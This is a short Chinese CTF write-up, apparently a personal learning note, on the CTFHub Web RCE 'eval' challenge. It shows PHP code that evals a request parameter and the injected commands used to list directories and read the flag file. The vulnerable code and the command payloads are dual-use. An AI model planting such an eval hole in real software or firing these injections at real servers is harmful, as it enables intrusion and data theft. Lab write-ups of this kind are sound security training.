CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
远离UE42 小时前
houdini hda 如何让模拟与虚幻物体进行碰撞
笔记·学习·houdini
浮游本尊3 小时前
React 18.x 学习计划 - 第十四天:实战整合与进阶收尾
前端·学习·react.js
The_Uniform_C@t24 小时前
PWN | 对CTF WIKI的复现+再学习 (第八期)
网络·学习·网络安全·二进制
前路不黑暗@5 小时前
Java项目:Java脚手架项目的登录认证服务(十三)
java·spring boot·笔记·学习·spring·spring cloud·maven
前路不黑暗@6 小时前
Java项目:Java脚手架项目的 C 端用户服务(十五)
java·开发语言·spring boot·学习·spring cloud·maven·mybatis
Hello_Embed7 小时前
Modbus 传感器开发:STM32F030 libmodbus 移植
笔记·stm32·学习·freertos·modbus
知识分享小能手8 小时前
SQL Server 2019入门学习教程,从入门到精通,SQL Server 2019 视图操作 — 语法知识点及使用方法详解(16)
sql·学习·sqlserver
前路不黑暗@9 小时前
Java项目:Java脚手架项目的 B 端用户服务(十四)
android·java·开发语言·spring boot·笔记·学习·spring cloud
锅包一切9 小时前
PART17 一维动态规划
c++·学习·算法·leetcode·动态规划·力扣·刷题
热门推荐
01GitHub 镜像站点02从零搭建一个 PHP 登录注册系统(含完整源码)03使用 1panel面板 部署 php网站04AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot05openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南06MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08让你的代码更整洁:10 个必知的 Kotlin 扩展函数09配置 OpenClaw 使用 Ollama 本地模型10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)